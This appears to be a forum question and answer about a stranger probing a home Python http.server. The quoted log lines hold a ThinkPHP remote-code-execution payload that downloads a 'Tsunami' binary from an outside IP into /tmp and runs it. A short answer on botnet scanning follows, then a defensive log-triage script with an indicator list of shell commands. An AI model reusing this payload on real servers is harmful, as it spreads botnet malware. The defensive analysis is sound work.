
Python 3 http.server - A strange IP address tried to connect to my server


Several minutes ago, I ran a Python-based server to share a few files with my friend. I disabled the Windows firewall so that he could connect and download the files. When someone tries to connect to the server, Python shows their IP address and the path they requested.

Someone whom I don't know tried to get my index.php and run wget. I checked their IP address and it seems like they're from Japan. So, how did this person know my IP address and try to connect to my computer? I've only shared it with my friend on WhatsApp.

I've done this many times before and this is the first time something like this has happened.

61.192.55.32 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1")
61.192.55.32 - - [06/Jan/2019 01:27:16] "GET /index.php?s=/index/       hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://185.255.25.168/OwO/Tsunami.x86 -O /tmp/.Tsunami; chmod 777 /tmp/.Tsunami; /tmp/.Tsunami Tsunami.x86' HTTP/1.1" 400 -

Solution

  • There are many people out there running tools like Masscan with custom scripts looking for vulnerable web servers. Most of the time these kinds of scripts are trying to get reverse shells in an attempt to build botnet armies. There are also some reports of Windows machines connected to the internet being hacked before the OS finishes its installation.
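
As an added example (not part of the original question or answer), the following triages http.server console output like the lines quoted in the question: it groups entries by client IP, flags tokens seen in that probe, and marks clients that were not expected. The names `triage`, `suspicious` and `INDICATORS` are hypothetical, and the sample log is constructed, using documentation address ranges and an `example.invalid` URL.

```python
import re
from collections import defaultdict

# http.server prints: IP - - [timestamp] <rest>, where <rest> is either a
# quoted request plus status, or an error note such as 'code 400, message ...'.
LINE = re.compile(r'^(?P<ip>\S+) - - \[(?P<ts>[^\]]+)\] (?P<rest>.*)$')
REQUEST = re.compile(r'^"(?P<req>.*)" (?P<status>\d{3}) ')

# Tokens taken from the probe quoted in the question; not a complete signature set.
INDICATORS = ("invokefunction", "call_user_func_array", "shell_exec",
              "wget ", "chmod 777", "/tmp/")

# Constructed sample input modelled on the question's log lines.
PROBE = ("GET /index.php?s=/index/invokefunction&function=call_user_func_array"
         "&vars[0]=shell_exec&vars[1][]= 'wget http://example.invalid/x -O /tmp/.x;"
         " chmod 777 /tmp/.x' HTTP/1.1")
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Jan/2019 01:20:03] "GET /photos.zip HTTP/1.1" 200 -',
    f'198.51.100.7 - - [06/Jan/2019 01:27:16] code 400, message Bad request syntax ("{PROBE}")',
    f'198.51.100.7 - - [06/Jan/2019 01:27:16] "{PROBE}" 400 -',
]

def triage(lines, expected_clients=()):
    """Group log lines by client IP, recording request count and indicator hits."""
    report = defaultdict(lambda: {"requests": 0, "indicators": set(), "expected": False})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an http.server log line
        entry = report[m["ip"]]
        entry["expected"] = m["ip"] in expected_clients
        rest = m["rest"]
        if REQUEST.match(rest):
            entry["requests"] += 1  # error notes are not counted as requests
        lowered = rest.lower()
        entry["indicators"].update(t.strip() for t in INDICATORS if t in lowered)
    return dict(report)

def suspicious(report):
    """Clients that sent a flagged request or were not on the expected list."""
    return sorted(ip for ip, e in report.items() if e["indicators"] or not e["expected"])

if __name__ == "__main__":
    for ip in suspicious(triage(SAMPLE_LOG, expected_clients={"192.0.2.10"})):
        print("review:", ip)
```

The 400 status in both the question's log and this sample shows http.server rejected the request line, so nothing was served or executed; the value of the triage is seeing who reached the port at all.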